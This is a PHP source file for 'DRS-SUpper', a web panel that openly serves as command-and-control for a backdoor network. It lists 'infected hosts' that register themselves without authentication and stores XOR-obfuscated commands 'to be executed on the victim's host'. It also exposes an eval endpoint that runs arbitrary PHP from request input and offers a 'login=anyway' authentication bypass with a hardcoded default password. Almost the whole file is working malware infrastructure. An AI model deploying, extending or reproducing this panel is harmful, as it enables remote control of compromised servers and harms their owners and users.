<?php 
session_start(); error_reporting(E_ALL ^ E_NOTICE);
#-----------------------------------------------------------#
/*  ____  ____  ____       ____  _   _
   |  _ \|  _ \/ ___|     / ___|| | | |_ __  _ __   ___ _ __
   | | | | |_) \___ \ ____\___ \| | | | '_ \| '_ \ / _ \ '__|
   | |_| |  _ < ___) |_____|__) | |_| | |_) | |_) |  __/ |
   |____/|_| \_\____/     |____/ \___/| .__/| .__/ \___|_|
                                      |_|   |_|*/$ver="v1.2";
#------ DRS-SUpper by DRS David Soft <David@Refoua.me> -----#

$color = "#125aed"; //Nice Blue ;)

if ($_REQUEST["ajax"] != true) { ?>
<!DOCTYPE html>
<html id="DRS-SUpper" lang="en">
	<head>
		<title>DRS-SUpper Admin</title>
		<style>
		<?php if (!empty($_REQUEST["color"])) $color = $_REQUEST["color"]; echo $css="
		/* Do NOT include any double quotes! */

		body { /* background-image: url(img/bg.png) */ }
		.box { background-image: url(img/leather.png)}
		.box:hover textarea,
		.box:hover input[type=password],
		.box:hover .text { /*background-image: url(img/gliph.gif)*/ }
		*, .box * {
		    background: fixed center;
		    transition: .3s ease, width 0s;
		    -webkit-transition: .3s ease, width 0s;
		    -moz-transition: .3s ease, width 0s;
		    -o-transition: .3s ease, width 0s;
		    transition: .3s ease, width 0s;
		}
		html,
		body {
		    margin: 0;
		    padding: 0;
		}
		body {
		    cursor: default;
		    background-color: black;
		    color: #ddd;
		    text-shadow: 0 1px black;
		    font-family: 'Segoe UI', Tahoma, arial, sans-serif;
		    padding-bottom: 80px;
		    padding-top: 20px;
		    overflow: auto;
		    overflow-y: scroll;
		}
		a { color: #eee; text-decoration: none; }
		a:hover { color: #fff }
		
		.footer {
		    position: fixed;
		    bottom: 0;
		    width: 90%;
		    left: 0;
		    margin-left: 5%;
		    border-top: 2px solid $color;
		    padding: 5px;
		    height: 50px;
		    background-color: rgba(0,0,0,.5);
		}
		
		.box {
		    position: relative;
		    margin: 40px auto;
		    padding: 5px 10px;
		    box-shadow: 0 0 20px 1px $color;
		    border-radius: 5px;
		    border: 5px solid $color;
		    border-top-width: 2px;
		    border-bottom-width: 2px;
		    background-color: #101010;
		    width: 600px;
		}
		.box:hover{
		    box-shadow: 0 0 25px 3px $color;
		}
		.box:hover b{
			text-shadow: 0 2px black, 0 0 15px $color;
		}
		.box b {
		    color: $color;
		    text-shadow: 0 1px black, 0 2px black;
		    font-size: 130%;
		    display: block;
		    width: 100%;
		    background: #050505;
		}
		.box label {
		    font-weight: bold;
		    padding: 5px;
		}
		.box input[type=password] {
		    outline: 0;
		    border: 2px solid $color;
		    background-color: black;
		    color: $color;
		    text-align: center;
		    font-size: 120% padding: 5px;
		    margin: 3px;
		    line-height: 20px;
		}
		.box textarea,
		.box .text {
		    display: inline-block;
		    box-sizing: border-box;
		    font-size: 9pt;
		    outline: 0;
		    border: 2px solid $color;
		    background-color: black;
		    color: #eee;
		    padding: 5px;
		    margin: 20px 0;
		    width: 100%;
		    max-width: 100%;
		    height: 110px;
		    overflow: auto;
		}
		.box textarea, .box .text, .box input[type=password]{
			min-height: 25px;
			vertical-align: middle;
			border: 1px solid rgba(40,40,40,.4);
			box-shadow: inset 0 1px 2px 1px rgba(0,0,0,.2), 0 1px rgba(255,255,255,.15);
			background-color: rgba(0,0,0,.3);
			text-shadow: 0 1px black;
			border-radius: 2px;
		}
		.box textarea		{color: $color;}
		.box textarea:focus	{color: #eee;}
		.box textarea:focus,
		.box .text:hover	{height: 300px}
		
		.box input[type=submit],
		.box .button {
		    text-decoration: none;
		    display: inline-block;
		    vertical-align: middle;
		    cursor: pointer;
		    border-radius: 2px;
		    text-shadow: none;
		    font-size: 9pt;
		    outline: 0;
		    background-color: rgba(0,0,0,.8);
		    box-shadow: inset 0 0 0 1px rgba(255,255,255,.1), 0 0 0 1px black;
		    border: 1px solid $color;
		    color: $color;
		    text-align: center;
		    margin: 8px;
		    min-width: 180px;
		    padding: 3px;
		}
		.box input[type=submit]:hover,
		.box .button:hover {
		    background-color: $color;
		    color: white;
		    text-shadow: 0 1px black;
		    box-shadow: inset 0 1px rgba(255,255,255,.2), 0 1px rgba(0,0,0,.2), 0 3px 5px #111;
		    border-color: black;
		}
		.box input[type=submit]:active,
		.box .button:active {
		    border-color: black;
		    background: #111;
		    box-shadow: 0 1px rgba(255,255,255,.2), inset 0 1px rgba(0,0,0,.2), 0 3px 5px #111 !important;
		}
		
		.box .icon{
			position: absolute;
			left: -60px;
			top:  -20px;
			max-width:  110px;
			max-height: 110px;
		}
		.box iframe {
		    outline: 0;
		    border: 2px solid $color;
		    background-color: white;
		    padding: 5px;
		    margin: 3px;
		    width: 80%;
		    overflow: auto;
		    height: 300px;
		}
		.box > a:not([class]){
			text-decoration: none;
			color: $color;
			border-bottom: 1px dotted $color;
			padding: 2px 5px;
		}
		.box > a:not([class]):hover{
			color: white;
			border-bottom-color: white;
		}
		.box hr {
		    clear: both;
		    border: 0;
		    border-top:    1px solid #111;
		    border-bottom: 1px solid #333;

		}
		
		.box .notice{
			text-align: center;
			margin: auto;
			margin-top: 20px;
			display: block;
			color: #999;
		}
		
		.box .notice:before{content:'[';color:#bbb;font-size:8pt;font-weight:bold}
		.box .notice:after {content:']';color:#bbb;font-size:8pt;font-weight:bold}
		
		.count{
			display: inline-block;
			vertical-align: middle;
			min-width: 50px;
			text-align: left;
			font-size: 10pt;
			font-weight: bold;
			float: left;
		}
		
		.remove{
			display: inline-block;
			vertical-align: middle;
			cursor: pointer;
			opacity: 0;
			color: red;
			float: right;
			font-size: 10pt;
			font-weight: bold;
			min-width: 20px;
			text-align: center;
		}
		
		.hidden{
			opacity: 0;
			visibility: hidden;
			z-index: -1;
			margin-top: -50px;
			max-height: 0;
		}
		
		#notice{
			z-index: 100;
			position: fixed;
			top: 0; left: 0;
			width: 100%;
			overflow: hidden;
			padding: 20px 0;
			background: $color;
			text-align: center;
			font-weight: bold;
			font-size: 120%;
			opacity: .8;
		}
		
		#notice:after{
			content: 'Click here to Close';
			padding: 0 10px;
			display: inline-block;
			font-size: 90%;
			font-weight: normal;
			opacity: .9;
		}
		
		#notice.success{
			background: green;
		}
		#notice.error{
			background: red;
		}
		
		a:hover .remove {opacity:1}
		
		.list{
			text-align: left;
		}
		
		.list a{
			text-decoration: none;
			padding: 2px 5px;
			display: block;
		}
		
		.list a:active{
			color: white;
		}
		
		.list a:hover, .list a:focus{
			background: $color !important;
			color: white;
			border-bottom-color: transparent;
		}
		
		li{
			background-color: #181818;
			text-shadow: 0 1px black;
			display: block;
		}

		li:nth-child(2n+1){
			background: #333;
		}
		
		.list a:hover .count:before,
		.list a:hover .count:after,
		.list a:focus .count:before,
		.list a:focus .count:after{
			color: #ddd;
		}
		
		.count:before{content:'[';color:$color;font-size:8pt;font-weight:bold}
		.count:after {content:']';color:$color;font-size:8pt;font-weight:bold}

		::-webkit-selection {background:$color;}
		::-moz-selection {background:$color;}
		::-ms-selection {background:$color;}
		::-o-selection {background:$color;}
		::selection {background:$color;}
		
		::-webkit-scrollbar {
		    width: 15px;
		    height: 15px;
		}
		
		::-webkit-scrollbar-track {background: #333;}
		
		::-webkit-scrollbar-thumb		 {background: #888;}
		*:focus::-webkit-scrollbar-thumb,
		::-webkit-scrollbar-thumb:hover	 {background: $color;}
		
		"; ?>

		</style>
		<noscript><style>
		.scripted{display: none;}
		</style></noscript>
	</head>
	
	<body>
		<div id="notice" class="hidden" onclick="toggle(this, 'hidden')">
			Sample message.
		</div>
		
		<center class="box">
		<b>DRS-SUpper <?php echo $ver; ?> Admin</b>
		<div id="message">
		<?php $ajax = 0; } else $ajax = 1; // Defined at the top.
		if ($ajax) header("Content-Type: text/plain");
		
		$home = $ajax ? '' : "<a href='?'>[ Go Back to Home ]</a>";

		# Mini Configuration #
		$conf         = "";    // Ajax pre-config
		$login        = false; // Login without a password (Public)
		$listFile     = "list.txt";
		$passFile     = "login_md5";
		$defaultAdmin = "igotthepower";

		#- Rest of the Code -#

		// Unmagic Quotes
		function unmagic($bin){
			while (1){
				$str = str_replace( '\"','"',str_replace("\\'","'",$bin));
				if ($str == $bin) break; else $bin = $str;
			}
			return $str;
		}
		
		function logname($filename, $item = "", $times = 1){
			$list = array(); $enteries = array();
			$data = @file_get_contents($filename);
			$enteries = explode("\r\n", $data);
			if (!empty($item)) array_unshift($enteries, $item);

			foreach ($enteries as $query){
				$info = explode('|', $query);
				if (!$info[0]) continue;
				if (!$info[1]) $info[1] = $times;
				$list[$info[0]] += $info[1];
				unset($info);
			}
			$enteries = array();
			foreach ($list as $info => $query) {
				$entery = "";
				
				if ($query > 0)
				$entery = "$info|$query";
				
				//if ($query == 1)
				//$entery = "$info";
				
				$enteries[] = $entery;
			}
			$data =  @implode("\r\n", $enteries);
			@file_put_contents($filename, $data);
			
			if (filesize($filename) <= 0)
			unlink($filename);
		}

		$passHash = @file_get_contents($passFile);
		if (!isset($passHash) || $passHash == "") $passHash = md5($defaultAdmin);

		if (isset($_REQUEST['about'])) {
			# Please be a man! I've worked hard and put efforts on this code.
			# Don't just STEAL it and remove my name! Thank you! :D
			# DRS David Soft - David@Refoua.me
			echo "by <a href='http://www.refoua.me/'>DRS David Soft</a> - <a href='mailto:David@Refoua.me'>David@Refoua.me</a></center><center class='box'>";
		}
		
		$nologin = $forceLogin = 0;
		if ($_REQUEST['login'] == 'anyway') {
			echo "<font color=red>Logged in anyway!</font><br>";
			$conf .= "&login=anyway";
			$forceLogin = $login = true;
		}
		if ($_REQUEST['logout'] == 1 && !isset($_REQUEST['login'])) {
			echo "You're now logged out.<br>";
			session_destroy();
			$login = false;
			$nologin = true;
		}
		if (isset($_REQUEST['pass']) && $nologin != true){
			if (md5($_REQUEST['pass']) == $passHash) {
				if (!isset($_REQUEST['cnfpass'])) echo "Login Successful. ";
				$_SESSION['hash'] = md5($_REQUEST['pass']);
				$login = true;
			} else {
				echo "Incorrect Password!<br>";
				$login = false;
				$nologin = true;
			}
		}
		if (isset($_SESSION['hash']) && $nologin != true){
			if ($_SESSION['hash'] == $passHash) {
				if (!$ajax) echo "Welcome, buddy!<br>";
				$login = true;
			} else {
				if (!$ajax) echo "Admin's password has been changed.<br>Please re-login.<br>";
				$login = false;
			}
		}
		if ($forceLogin){
			$login   = 1;
			$nologin = 0;
		}
		if (!empty($_REQUEST['add'])) {
			logname($listFile, $_REQUEST['add']);
			logname("all.txt", $_REQUEST['add']);

			echo "Client added to the list!<br>";
			if (!$login) exit($home);
		}

		if (!$login) {
			if (isset($_REQUEST['pass']))		@header("HTTP/1.0 403 Wrong Password", true, 403);
			elseif (!isset($_REQUEST['cnfpass']))	@header("HTTP/1.0 403 Not Logged-in",  true, 403);
			
			if (!isset($_REQUEST['cnfpass'])){
				if (!$ajax) { ?>
					<img class="icon" src="img/lock.png">
					<hr>
					<strong>Please login to the DRS-Supper Admin Panel</strong>
					<form method="post" action="?login">
					<br/><label for="pass">Password: <input id="pass" name="pass" type="password" placeholder="Enter here"></label>
					<br/><input type="submit" value="OK" />
					</form>
				<?php }
				else {	echo "You are not logged-in to DRS-Supper Admin.<br>"; };
			}
			
			exit();
		}
			else if (!$ajax) { ?>
				<img class="icon" src="img/config.png">
		<?php	}
		
		if (!empty($_REQUEST['remove'])) {
			logname($listFile, $_REQUEST['remove'], -1000000000);

			echo "Client removed from the list!<br>";
			if (!$login) exit($home);
		}

		if ($_REQUEST['clear'] == 1) {
			file_put_contents($listFile, '');
			echo "List Cleared!<br>";
		}
		
		logname($listFile);
		
		if (isset($_REQUEST['cnfpass'])) {
			if ($_REQUEST['cnfpass'] == $_REQUEST['newpass']) {
				$done = 0;
				if ($_REQUEST['newpass'] != $defaultAdmin) $done = file_put_contents($passFile, md5($_REQUEST['newpass']));
				else $done = unlink($passFile);
				
				if ($done) echo "Password changed!<br>";
				else {@header("HTTP/1.0 500 Server Error", true, 500); die("Can not change the Password file!<br>");}
			} else {
				@header("HTTP/1.0 403 Wrong Password", true, 403);
				echo "Passwords do NOT match.<br>";
			}
		}
		
		if (!empty($_REQUEST['echo'])) {
			echo(unmagic($_REQUEST['echo']))."<br>\n";
		}
		
		if (!empty($_REQUEST['eval'])) {
			echo "<b>PHP Code run:</b> ";
			eval(unmagic($_REQUEST['eval']))."<br>\n";
		}
		
		if (isset($_REQUEST['cmd'])) {
			$cmd = "#SERVICE:" . $_REQUEST['cmd'];
			for ($i=0; $i<strlen($cmd); $i++) $code .= chr( 1 ^ ord($cmd[$i]) );
			file_put_contents('update.bin', $code);
			echo "Command Saved!<br>";
		}
		
		if (!isset($cmd) || $cmd == "") {
			$updBinary = @file_get_contents("update.bin");
			$cmd = ""; for ($i=0; $i<strlen($updBinary); $i++) $cmd .= chr( 1 ^ ord($updBinary[$i]) );
		}

		if (substr($cmd, 0, 9) == '#SERVICE:'){
			$cmd = substr($cmd, 9);
		} else {$cmd = "";}

		$random = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789-DRSDavidSoft-David@Refoua.me'), 0, 10);

		$plit			= "---|=[Bo.un.da.ry]=|---";
		$notice_boundary	= "-+[-Notice.Boundary-]+-";
		
		if ($ajax) echo "$notice_boundary$cmd$plit";
		else {
		?>
		</div>
		
		<script>
			function _(x){return document.getElementById(x)}
			
			function toggle(obj, css, s){
				var z=0,n=[],c=(C=obj.className).split(' ');
				for(i=0;i<c.length;i++)if(c[i]==css)z=1;else n.push(c[i]);
				if((!z&&s!=-1)||s==1)n.push(css);obj.className=n.join(' ');
			}
			
			function msg(txt, type, timeOut){
				toggle(N=_('notice'), 'hidden', !txt ? +1 : -1);
				for (i in s=['success','error']) toggle(N, s[i], s[i] == type ? 1 : -1);
				if (txt) N.innerHTML = txt;
				
				var timeOut = timeOut || 3000; (w=window).clearTimeout(w.nT);
				if(timeOut>0) w.nT =	w.setTimeout("msg(false)", timeOut);
			}
			
			function update(config, method, ajax){
				var url = "?ajax=" + (ajax||'1') +<?php if(!empty($conf)) echo " '$conf' +"; ?> (config ? "&"+config : '');
				
				var ajax = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");

				ajax.onabort=function() {msg ("Command aborted.", 'error')}
				ajax.onreadystatechange=function(){
					if (ajax.readyState==4) {
						var txt = ajax.responseText;
						window.TransferingData = false;
						window.lastMessage = txt;
						if (ajax.status==200 && txt) {
							if (txt.toLowerCase().indexOf((html=document.getElementsByTagName('HTML')).id) > -1) html[0].innerHTML = txt;
							info = txt.split("<?php echo $notice_boundary; ?>").reverse();
							if (info[1]) msg(info[1], 'success');
							if (info.length == 1) {msg(info[0], 'success'); return}
							info = info[0].split(plit="<?php echo $plit; ?>");
							if (info[0]) _('command').value  = info[0];
							if (info[1]) _('list').innerHTML = info[1];
						} else msg('Error ' + ajax.status + (txt ? ": "+txt : ''), 'error');
					}
				}
				
				ajax.open(method||"GET",url,true);
				
				msg("Sending command, Please wait...");
				window.TransferingData = true;
				ajax.send();
			}
			
			function val(obj){
				var parms = "";
				if (!obj) return false;
				
				for (i in a = obj.getElementsByTagName('*'))
				if (a[i].name && a[i].value != undefined) parms += a[i].name + '=' + escape(a[i].value) + '&';
				
				return parms;
			}
			
			window.TransferingData = false;
			//window.setInterval(function() {
			//	if (!window.TransferingData)
			//	update();
			//}, 5000);
		</script>
		
		<hr>
		<button class='button scripted' onclick="toggle(_('changePass'), 'hidden')">Change Panel Password</button>
		<a class='button' onclick="return (confirm('Do you want to leave your panel?'))" href="?logout=1">Logout</a>
		</center>

		<center id="changePass" class="box">
			<img class="icon" src="img/lock.png">
			<b>Change Admin Panel Password</b>
			<form method="post" onsubmit="if (_('curPass').value == '' || _('newPass').value == '' || _('cnfPass').value == '') {msg('Please fill all of the fields.<br>', 'error'); return false;}; if (_('newPass').value != _('cnfPass').value) {msg('The entered passwords don\'t match.<br>', 'error'); return false;}; update(val(this), 'POST'); toggle(this.parentNode, 'hidden'); _('curPass').value = ''; _('newPass').value = ''; _('cnfPass').value = ''; return false;"><table>
			<tr><td><label for="curPass">Current Password:</label></td>	<td><input id="curPass" name="pass"    placeholder="Your Password" type="password" /></td></tr>
			<tr><td><label for="newPass">New Password:</label></td>		<td><input id="newPass" name="newpass" placeholder="At least 3 characters" type="password" /></td></tr>
			<tr><td><label for="cnfPass">Confirm Password:</label></td>	<td><input id="cnfPass" name="cnfpass" placeholder="Enter it again" type="password" /></td></tr>
			<tr><td colspan=2 style="text-align:center"><input id="cpbtn" type="submit" value="Change" /></td></tr>
			</table>
			<script>toggle(_('changePass'), 'hidden')</script>
			</form>
		</center>

		<center class="box">
			<img class="icon" src="img/command.png" />
			<b>Send Command</b>
			Enter your desired command to be executed on the victim's host:
			<form method="post" onsubmit="update(val(this), 'POST'); return false;">
			<textarea id="command" name="cmd"><?php echo $cmd; ?></textarea>
			<br/><input type="submit" value="Save" />
			</form>
		</center>
		
		<script>
			function Remove (item){
				if (!item) return;
				else item = item.parentNode;
				
				var title = item.href || item.title;
				if (!confirm('Do you want to remove "' + title + '" from the list?')) return;
				
				update ("remove=" + title);
			}
		</script>

		<center class="box" style="position: relative">
			<img class="icon" src="img/servers.png" />
			<b>Infected Hosts Back-doors</b> <a class="button" style="position: absolute; min-width: 50px; right: 10px; top: 10px;" onclick="if(!confirm('Are you sure to clear every single one of this list, dude?!')) return false; update(this.href.split('?')[1]); return false;" href="?clear=1">Clear All</a>
			This is a list of your infected hosts:
			<br><a class="button" onclick='update("echo=List Updated!"); return false;' href="?update=1">Refresh List</a>
			<br><ul id="list" class="text list"><?php echo "\n"; }
				$padding =  !$ajax ? str_repeat("\t", 4) : "";
				$list = explode("\r\n", $file = @file_get_contents($listFile));
				if ($file && count($list) > 0) {
					foreach ($list as $item) {
						$info = explode('|', $item); $type = strstr($info[0], "http://") ? "href" : "title"; if (!empty($item)) 
						echo $padding . "<li><a $type='$info[0]' target='_blank'><span class='count'>$info[1]</span>$info[0]<span title='Remove This' onclick='Remove(this); return false;' class='remove'>x</span></a>\n";
					}
					echo "<li><span style='float:right;font-size: 9pt;'>Total <strong>".count($list)."</strong> infected servers listed.</span>";
				}
				else echo '<span class="notice">empty</span>';
			if (!$ajax) { ?>
			</ul>
		</center>

		<center class="footer">
			<a href="http://blog.refoua.me/post/drs-supper/">DRS-SUpper <?php echo $ver; ?></a><br>
			by <a href="mailto:David@Refoua.me">David@Refoua.me</a>
		</center>
	</body>
</html>
<?php } exit(); ?>